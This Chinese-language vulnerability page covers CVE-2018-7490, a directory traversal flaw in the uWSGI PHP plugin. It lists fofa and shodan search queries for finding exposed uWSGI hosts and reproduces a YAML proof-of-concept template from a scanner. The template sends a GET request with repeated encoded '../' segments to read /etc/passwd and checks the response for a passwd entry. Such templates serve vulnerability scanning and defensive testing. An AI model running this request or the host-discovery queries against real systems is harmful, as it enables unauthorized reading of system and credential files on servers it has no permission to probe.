CVE-2018-7490: uWSGI PHP Plugin Directory Traversal

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

uWSGI PHP Plugin Directory Traversal fofa: app="uWSGI" shodan: http.html:"uWSGI"

PoC代码[已公开]

id: CVE-2018-7490

info:
  name: uWSGI PHP Plugin Directory Traversal
  author: unkown
  severity: high
  description: |-
    uWSGI PHP Plugin Directory Traversal
    fofa: app="uWSGI"
    shodan: http.html:"uWSGI"
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7490
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7490
    - https://www.tenable.com/security/tns-2018-05
  tags: cve,cve2018,uwsgi,traversal
  created: 2023/08/10

rules:
  r0:
    request:
      method: GET
      path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2018/CVE-2018-7490.yaml